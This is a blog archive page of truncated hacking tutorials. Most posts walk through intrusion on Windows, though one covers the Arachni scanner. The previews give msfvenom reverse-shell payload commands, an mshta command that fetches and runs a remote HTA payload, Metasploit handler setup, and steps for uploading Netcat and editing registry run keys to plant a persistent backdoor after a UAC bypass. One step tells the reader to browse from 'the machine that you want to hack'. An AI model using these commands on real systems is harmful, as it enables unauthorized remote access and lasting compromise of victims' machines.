Posts

Showing posts from September, 2021

Arachni Scanner

Image
Requirement: Windows 10 and Power Shell " Arachni " Is A Tool That Allows You To Assess The Security Of " Web Applications ".  In Less Simple Terms, Arachni Is A High-Performance, Modular, Open Source Web Application Security " Scanner Framework ". It Is A System Which Started Out As An Educational Exercise And As A Way To Perform Specific Security Tests Against A Web Application In Order To " Identify ", " Classify " And " Log Issues " Of " Security Interest ". It Has Now Evolved Into An Infrastructure Which Can Reliably Perform Any Sort Of WebApp Related Security Audit And General Data Scraping. Step 1 :- Download And Install " Arachni Scanner ".      https://www.arachni-scanner.com/download/     Step 2 :- " Extract And Navigate " To The Bin Folder Inside Arachni Folder.     Step 3 :- Fire-Up The " Web Interface " By Executing The Following Command.      .\arachni_web.bat   It Will St...

HTA Attack Using Metasploit

Image
What is HTA Attack? " HTML Application (HTA) " Is An HTML Microsoft Windows Program Capable Of Running Scripting Languages, Such As VBScript Or JScript. The Metasploit HTA Web Server Exploit Module Hosts An HTA That When Opened Runs A Payload Via Power Shell. Perform HTA Attack Step 1 : To Create Payload For Windows. Open Terminal And Type. To " Start Python Server " Write Below Command.     msfvenom -p windows/meterpreter/reverse_tcp lHOST=192.168.0.103 lport=1234 -f hta-psh > shell.hta Note: 192.168.0.103 Is My System ip Address And 1234 Is The Port Number That I Want To Use.     python -m SimpleHTTPServer 80       Step 2: Run The Above File By Typing:    mshta.exe http://192.168.0.103/shell.hta Step 3: Simultaneously, Start Your Handler To Receive A Session When You Run The Above File In The Victim’s cmd Prompt. To Start The Multi/Handler Type:      use exploit/multi/handler      msf exploit(mul...

Install & Activation Metasploit Pro in windows

Image
Step 1:- O pen Link And Fill Details As Follow. " Read And Select Agreement " And Then Click On " S ubmit" Button.      https://www.rapid7.com/products/metasploit/download/pro/ Step 2:- Select Windows " 64 bit ". The Metasploit File Will Starting.   Step 3:- Now Open Your Email, You Will Get " P roduct Key ". Step 4:- After You Download The Installer, Locate The File And " Double Click " The Installer Icon To Start The Installation Process. When the Setup screen appears, click Next to continue.   Step 5:- Read The " License Agreement " And Select The " I Accept " The License Agreement Option. Click Next To Continue.     Step 6:- " Browse To The Location " Where You Want To Install The Metasploit Framework. By Default, The Framework Is Installed On The " C:\ Metasploit-framework " Directory. Click Next To Continue.   Step 7:- Click On " Next Button ". Step 8:- Click On " Nex...

Persistent NETCAT Backdoor - Registry Run Keys

Image
The Windows Registry Is A Magical Place Where, With Just A Few Keystrokes, You Can Render A System Virtually Unusable. So, Be Very Careful On This Next Section As " M istakes Can Be Painful " . We Will Be Installing A Netcat Backdoor. Note: You Can " Download Netcat " From Here:-     https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip or   https://mega.nz/file/3VQwlBbI#6jl1aApYju0lzAuadmOiQArSDUrb3x5rGu-rpjshagQ        This Includes Changes To The System Registry And Firewall. Step 1 :- Create Payload Get " System Level Privilege ". Note: If You Don't Know Then Go To This Link And Do Same Step Of " UAC Bypass " To Get System Level Privilege. Step 2:- First, We Must Upload A Copy Of Netcat To The " Remote System ".  upload /root/Downloads/netcat/nc.exe Step 3: - Afterwards, We Work With The Registry To Have Netcat Execute On Start Up And Listen On Port 1234. We Do This By " Editing The Key ".  ‘HKEY_LOCAL_MACHI...

Persistence Backdoor Using Metasploit

Image
UAC Bypass/Persistence Backdoor Using Metasploit Creating Payload Step 1:- To Create Payload For Windows. Open Terminal And Type.      msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=1212 -f  exe >  /var/www/html/test.exe Note: 192.168.0.103 Is My System ip Address And 1212 Is The Port Number That I Want To Use. Step 2: - To Start Apache Server Write Below Command.      service apache2 start Step 3: - Open Browser Of Machine That You Want To Hack And Type " Ip Address " Of Your System.   Set Payload Step 4:- msfconsole.     Step 5: - Write Following Command To Exploit Method, Set Payload And Providing ip And port And Run.      use exploit/multi/handler      set payload windows/x64/meterpreter/reverse_tcp      set lhost 192.168.0.103      set lport 1212      run      You Will Get A Session      sys...